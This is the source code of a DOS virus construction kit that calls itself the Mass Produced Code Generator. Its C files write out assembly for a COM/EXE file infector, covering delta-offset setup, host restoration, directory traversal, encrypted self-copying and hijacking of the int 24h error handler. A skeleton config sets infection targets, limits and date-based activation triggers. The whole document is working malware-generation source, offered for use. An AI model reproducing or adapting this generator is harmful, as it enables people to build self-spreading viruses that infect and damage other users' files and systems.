char getyn(int line,char *d)
{
switch (toupper(*d))
{
case 'Y' : return 1;
case 'N' : return 0;
default : printerror(line,*d);
}
return 0;
}
void setplusminus(char *a, char b)
{
if (b == '+')
*a = 1;
else if (b == '-')
*a = -1;
else
*a = 0;
}
void parseactivate(int line, char *d, char min, char max, char *a, char *b,
char *s)
{
char *c=d;
char temp = (char)getnumber(line,d,'+',c);
if ((temp < min) || (temp > max))
printf("Invalid %s specified: %d. Range must be between %d &
%d.\n",s,temp,min,max);
else {
*a = temp;
if (b != 0) setplusminus(b,*c);
config.activation++;
}
}
void printerror(int line, char c)
{
printf("Error in line %d: Invalid character '%c'.\n",line,c);
}
void printblank(void)
{
fprintf(fp,"\n");
}
void getDBname(char *orig, char *name,char *delim)
{
*delim = '\'';
orig[strlen(orig)-1] = 0;
if (strchr(orig,'\''))
if (strchr(orig,'\"')) {
*delim = 0;
printf("Error in %s: Both single and double quotes used.",orig);
}
else
*delim = '\"';
if (*delim)
strcpy(name,orig);
}
----------------------------------- Cut Here --------------------------------
/* FILE: VMESSAGE.C */
#include "vheader.h"
void code_messages(void)
{
char b[80];
addvar("creator","db '[MPC]',0","Mass Produced Code Generator");
if (config.virusname[0]) {
sprintf(b,"db %c%s%c,0",config.virusnamedelim, config.virusname,
config.virusnamedelim);
addvar("virusname",b,"");
}
if (config.authorname[0]) {
sprintf(b,"db %c%s%c,0",config.authornamedelim, config.authorname,
config.authornamedelim);
addvar("author",b,"");
}
printblank();
}
----------------------------------- Cut Here --------------------------------
/* FILE: VRETURN.C */
#include "vheader.h"
void return_EXE(void);
void return_COM(void);
void code_return(void)
{
char s[80];
if (config.activation)
printlabel("exit_virus:","");
if (config.p.int24)
{
print("mov ax,2524h","Restore int 24 handler");
print("lds dx,[bp+offset oldint24]","to original");
print("int 21h","");
print("push cs","");
print("pop ds","");
printblank();
}
if (config.p.traverse == DOT_DOT) {
print("mov ah,3bh","change directory");
print("lea dx,[bp+origdir-1]","original directory");
print("int 21h","");
printblank();
}
print("mov ah,1ah","restore DTA to default");
print("mov dx,80h","DTA in PSP");
if (config.p.infectEXE)
{
if (config.p.infectCOM)
{
print("cmp sp,id-4","EXE or COM?");
print("jz returnEXE","");
printlabel("returnCOM:","");
return_COM();
printlabel("returnEXE:","");
return_EXE();
} else /* EXE only */
{
return_EXE();
}
} else
{
return_COM();
addvar("save3","db 0cdh,20h,0","First 3 bytes of COM file");
}
printblank();
}
void return_EXE(void)
{
print("pop es","");
print("pop ds","");
print("int 21h","");
print("mov ax,es","AX = PSP segment");
print("add ax,10h","Adjust for PSP");
print("add word ptr cs:[bp+jmpsave+2],ax","");
print("add ax,word ptr cs:[bp+stacksave+2]","");
print("cli","Clear intrpts for stack manipulation");
print("mov sp,word ptr cs:[bp+stacksave]","");
print("mov ss,ax","");
print("sti","");
print("db 0eah","jmp ssss:oooo");
addvar("jmpsave","dd ?","Original CS:IP");
addvar("stacksave","dd ?","Original SS:SP");
if (config.p.infectCOM) {
addvar("jmpsave2","db ?","Actually four bytes");
addvar("save3","db 0cdh,20h,0","First 3 bytes of COM file");
} else
addvar("jmpsave2","dd 0fff00000h","Needed for carrier file");
addvar("stacksave2","dd ?","");
}
void return_COM(void)
{
print("int 21h","");
print("retn","100h is on stack");
}
----------------------------------- Cut Here --------------------------------
/* FILE: VSETUP.C */
#include "vheader.h"
void restore_COM(void);
void restore_EXE(void);
void code_setup(void)
{
addheap("buffer","db 1ah dup (?)","read buffer");
if (!config.p.encrypt)
printlabel("startvirus:","virus code starts here");
print("call next","calculate delta offset");
printlabel("next: pop bp","bp = IP next");
print("sub bp,offset next","bp = delta offset");
printblank();
if (config.p.infectEXE)
{
if (config.p.infectCOM) /* COM & EXE */
{
print("cmp sp,id","COM or EXE?");
print("je restoreEXE","");
printlabel("restoreCOM:","");
restore_COM();
print("jmp short restoreEXIT","");
printlabel("restoreEXE:","");
restore_EXE();
printlabel("restoreEXIT:","");
print("movsw","");
} else /* EXE ONLY */
restore_EXE();
} else
restore_COM();
printblank();
if (config.maxinfect)
{
char b[80];
addheap("numinfec","db ?","Infections this run");
sprintf(b,"mov byte ptr [bp+numinfec],%u",config.maxinfect);
print(b,"reset infection counter");
printblank();
}
print("mov ah,1Ah","Set new DTA");
print("lea dx,[bp+newDTA]","new DTA @ DS:DX");
print("int 21h","");
printblank();
addheap("newDTA","db 43 dup (?)","Temporary DTA");
if (config.p.traverse == DOT_DOT)
{
print("mov ah,47h","Get current directory");
print("mov dl,0","Current drive");
print("lea si,[bp+origdir]","DS:SI->buffer");
print("int 21h","");
print("mov byte ptr [bp+backslash],'\\'","Prepare for later CHDIR");
addheap("origdir","db 64 dup (?)","Current directory buffer");
addheap("backslash","db ?","");
printblank();
}
if (config.p.int24)
{
addheap("oldint24","dd ?","Storage for old int 24h handler");
print("mov ax,3524h","Get int 24 handler");
print("int 21h","to ES:BX");
print("mov word ptr [bp+oldint24],bx","Save it");
print("mov word ptr [bp+oldint24+2],es","");
print("mov ah,25h","Set new int 24 handler");
print("lea dx,[bp+offset int24]","DS:DX->new handler");
print("int 21h","");
print("push cs","Restore ES");
print("pop es","'cuz it was changed");
printblank();
}
}
void restore_EXE(void)
{
print("push ds","");
print("push es","");
print("push cs","DS = CS");
print("pop ds","");
print("push cs","ES = CS");
print("pop es","");
print("lea si,[bp+jmpsave2]","");
print("lea di,[bp+jmpsave]","");
print("movsw","");
print("movsw","");
print("movsw","");
if (!config.p.infectCOM)
print("movsw","");
}
void restore_COM(void)
{
print("lea si,[bp+save3]","");
print("mov di,100h","");
print("push di","For later return");
if (!config.p.infectEXE)
print("movsw","");
print("movsb","");
}
----------------------------------- Cut Here --------------------------------
/* FILE: VSUBS.C */
#include "vheader.h"
void code_subroutines(void)
{
printlabel("open:","");
print("mov ah,3dh","");
print("lea dx,[bp+newDTA+30]","filename in DTA");
print("int 21h","");
print("xchg ax,bx","");
print("ret","");
printblank();
printlabel("attributes:","");
print("mov ax,4301h","Set attributes to cx");
print("lea dx,[bp+newDTA+30]","filename in DTA");
print("int 21h","");
print("ret","");
printblank();
if (config.p.encrypt)
{
printlabel("write:","");
print("pop bx","Restore file handle");
print("pop bp","Restore relativeness");
print("mov ah,40h","Write to file");
print("lea dx,[bp+decrypt]","Concatenate virus");
print("mov cx,heap-decrypt","# bytes to write");
print("int 21h","");
print("push bx","");
print("push bp","");
printlabel("endwrite:","");
printblank();
}
if (config.p.int24)
{
printlabel("int24:","New int 24h (error) handler");
print("mov al,3","Fail call");
print("iret","Return control");
printblank();
}
}
----------------------------------- Cut Here --------------------------------
/* FILE: VTAIL.C */
#include "vheader.h"
void code_tail(void)
{
if (config.p.infectCOM)
printlabel("end entry_point","");
else
if (config.p.encrypt)
printlabel("end decrypt","");
else
printlabel("end startvirus","");
}
----------------------------------- Cut Here -------------------------------
/* FILE: VTRAVEL.C */
#include "vheader.h"
void code_traversal_generic(void);
void dot_dot(void);
void lea_exe(void);
void lea_com(void);
void code_traversal(void)
{
config.p.calls_check = 0;
switch (config.p.traverse)
{
case NONE: code_traversal_generic(); break;
case DOT_DOT: printlabel("dir_scan:","\"dot dot\" traversal");
code_traversal_generic();
dot_dot();
break;
}
printblank();
printlabel("done_infections:","");
}
void code_traversal_generic(void)
{
if (config.p.infectEXE) {
lea_exe();
if (!config.p.infectCOM)
code_check();
}
if (config.p.infectCOM) {
lea_com();
if (config.p.infectEXE)
config.p.calls_check++;
else
code_check();
}
}
void lea_exe(void)
{
print("lea dx,[bp+exe_mask]","");
if (config.p.infectCOM)
print("call infect_mask","");
}
void lea_com(void)
{
print("lea dx,[bp+com_mask]","");
if (config.p.infectEXE)
print("call infect_mask","");
}
void dot_dot(void)
{
print("mov ah,3bh","change directory");
print("lea dx,[bp+dot_dot]","\"cd ..\"");
print("int 21h","");
print("jnc dir_scan","go back for mo!");
}
----------------------------------- Cut Here --------------------------------
/* FILE: VVAR.C */
#include "vheader.h"
void code_variables(void)
{
if (config.p.infectEXE) addvar("exe_mask","db '*.exe',0","");
if (config.p.infectCOM) addvar("com_mask","db '*.com',0","");
if (config.p.traverse == DOT_DOT)
addvar("dot_dot","db '..',0","");
}
----------------------------------- Cut Here --------------------------------
;FILE: SKELETON.CFG
;Skeleton configuration file for PS-MPC version 0.90a
;Lines beginning with semicolons denote comments
;Required parameters:
;Filename = <string>
;This is the filename to be generated by PS-MPC as the source code file.
Filename = target.asm
;Infect = (C,E)
;COM, EXE
;Note: You can mix the two, a la "Infect = C,E" Do not use a space to
; deliminate the two parameters.
Infect = C,E
;Optional parameters - Defaults are shown in square brackets
;Traversal = <N,D>
;([None], Dot Dot)
;If None is specified, then only the files in the current directory will be
;infected. If Dot dot is specified, then files in the current directory and
;subdirectories below the current will be infected.
Traversal = N
;Encrypted = <Y,N>
;(Yes, [No])
;Only turn off encryption if you wish to limit the size of the virus.
Encryption = Y
;IDWord = XX
;([ ],XX)
;The IDWord consists of two characters which are used to identify already
;infected EXE files. This line is not needed in COM-only infectors. Do
;not use an apostrophe or the source code will not assemble properly.
IDWord = DA
;MinSize = #
;(A,[0]..65535)
;MinSize is used only in the infection of COM files. Files under MinSize
;bytes are not infected. MinSize = 0 turns off this option. MinSize = A
;indicates use of the virus's effective length as the minimum size. This
;line is ignored in EXE-specific infectors.
MinSize = 0
;MaxSize = #
;(A,[0]..65535)
;MaxSize is used only in the infection of COM files. Files above MaxSize
;bytes are not infected. MaxSize = 0 turns off this option. MaxSize = A
;indicates automatic calculation of maximum size. This line is not needed
;in EXE-only infectors.
MaxSize = A
;Infections = #
;([0]..255)
;Infections is an optional counter limiting the number of infections per run
;of the virus to a specific number. Infections = 0 disables this option.
Infections = 0
;ErrorHandler = <Y,N>
;(Yes, [No])
;ErrorHandler selects if you wish to include a short critical error handler
;in the virus. This handler prevents Abort, Retry, Fail messages by taking
;over the critical error interrupt. Attempted infection of files on write-
;protected diskettes will not generate an error if this option is set.
ErrorHandler = Y
;CommandCom = <Y,N>
;(Yes, [No])
;This flag indicates whether you wish the virus to infect COMMAND.COM
;'Yes' turns off the check for COMMAND.COM, thus saving space.
CommandCom = N
;VirusName = <string>
;The only limitation to the string is that you may not use both the single
;and double quotes together in the string, i.e. the string B'li"p is not
;legal.
VirusName = [Skeleton]
;AuthorName = <string>
;The same constraints apply to AuthorName.
AuthorName = Deke
;AllowZero = <Y,N>
;(Yes, [No])
;This flags whether the virus will allow an encryption value of 0, which
;would effectively leave it in an unencrypted state. 'Yes' disables the
;zero check, thereby shortening code length.
AllowZero = N
;Activation Conditions
;All conditions must be satisfied for activation to occur
;Always = <Y,N>
;(Yes, [No])
;This flags whether the virus always activates, although I can't imagine a
;useful virus that does so.
;Always = N
;IfMonth = #
;<1..12><-,+>
;Activate if the month is equal to the specified number. Adding a minus sign
;after the month indicates activation before or during the specified month.
;Adding a plus sign after the month indicates activation during or after the
;specified month.
;IfMonth = 11+ ;Activate in either November or December
;IfDay = #
;<1..31><-,+>
;Activate if the date is on a certain date Adding a minus sign after the day
;indicates activation on or before that day. Similarly, adding a plus sign
;indicates activation on or after that day. Note: the program does not check
;to see if the number inputted is a valid date. For example, combining
;IfMonth=2 and IfDay=30+ will NOT result in an error, although the virus will
;clearly never activate.
;IfDay = 15+ ;Activate after the fifteenth of the month
;IfYear = #
;<0..65535><-,+>
;Activate during a certain year or years. Don't be stupid and put a
;ridiculous year such as 1-.
;IfYear = 1993+ ;Activate after 1993
;IfDOW = #
;<0..6><-,+>
;0 = Sunday, 1 = Monday, etc.
;Activate on, before, or after a particular day of the week.
;IfDOW = 0 ;Activate only on Sundays
;IfMonthDay = #,#
;<#,#><-,+>
;Activate on, before, or after a particular day of the year. This differs
;from the combination of IfMonth and IfDay.
;IfMonthDay = 5,9+ ;Activate only after May 9th
;compare to:
;IfMonth = 5+ ;Activate in May through December, but only if the
;IfDay = 9+ ;day is on or after the 8th. July 1st is NOT an
;activation date
;IfHour = #
;<0..23><-,+>
;This should be self-explanatory at this point.
;IfHour = 12 ; Activate any time from 12 noon -> 1 P.M.
;IfMinute = #
;<0..59><-,+>
;Duh.
;IfMinute = 30+
;IfSecond = #
;<0..59><-,+> ;; check 0
;This is somewhat useless, in my estimation
;IfSecond = 30+
;Percentage = #
;<1..99>
;This uses the 1/100 second counter as a random number. If the counter is
;less than the percentage, then the virus will activate.
;Percentage = 50 ; Even odds
-------------------------------- Stop Cutting -------------------------------
+++++
